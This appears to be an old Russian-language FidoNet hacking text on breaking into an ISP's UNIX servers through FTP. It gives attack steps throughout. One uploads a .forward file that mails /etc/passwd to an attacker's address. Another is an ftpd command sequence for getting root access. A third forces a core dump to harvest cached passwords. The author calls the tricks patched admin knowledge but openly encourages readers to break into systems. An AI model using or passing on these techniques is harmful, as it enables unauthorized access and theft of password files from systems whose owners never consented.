Как действительно можно сломать провайдера
Сразу хочу сказать - этот способ HЕ ПРОХОДИТ, если в качестве атакуемого сервера используется host,на котором стоит FreeBSD версии 2.* и более(ну если admin не идиот),а так же Linux(последнии версии).как это будет на др. UNIX'ax - я не знаю! как вы знаете список user-password хранится в /etc/passwd(опять же, если admin идиот - он может хранится и в ~/ftp/etc;-)). далее - если у вас есть вход на ftp под каким-либо именем или вход под anonymous(в этом случае у пользователя ftp домашний каталог, должен быть доступен для записи ) то можно сделать - следующее: cоздать файл .forward(етот файл выполняется, когда на имя данного пользователя приходить почта) и закачать в домашний каталог пользователя ftp. в файле .forward нужно поместить => |/bin/mail/ e-mail@vash.com < /etc/passwd после закачки этого файла в домашний каталог пользователя ftp(юзера), ему следует послать mail и сидеть, ждать пока к вам не придет passwd;-)
более старые ошибки в ftpd:
#ftp -n
ftp>open host.com
....
ftp>quote user ftp
....
ftp>qoute cwd ~root
...
ftp>quote pass ftp
...
ftp>ls -al/
если эта команда сработала - значит вы зашли в систему как root. еще один способ состоит в том, что в ftp надо переполнить список аргументов команды, что приведет к сбросу core(в котором будут находится кешированные пароли).утянуть core, можно имея анонимный вход. Однако опять же, в новых версиях все это пофиксено. уществуют, так же множество др. способов взлома через sendmail,telnet, tftp...- про которые мне влом писать. поэтому если вам надо что то взломать - учите UNIX,C и впреред:-) просьба не слать мне письма, с вопросами типа как получить пароли из passwd, "как создать файл .forward",что такое core.... если хотите со мной поговорить - ловите на irc. хочу вас так же предупредить, что не специализируюсь на взломе и знаю только то, что IMHO должен знать любой admin, если он не хочет иметь неприятностей на свою жопу. я надеюсь,что тут больше не будет ламерских вопросов - "как сломать интернет" ї
Sergey Skuridin 2:5025/19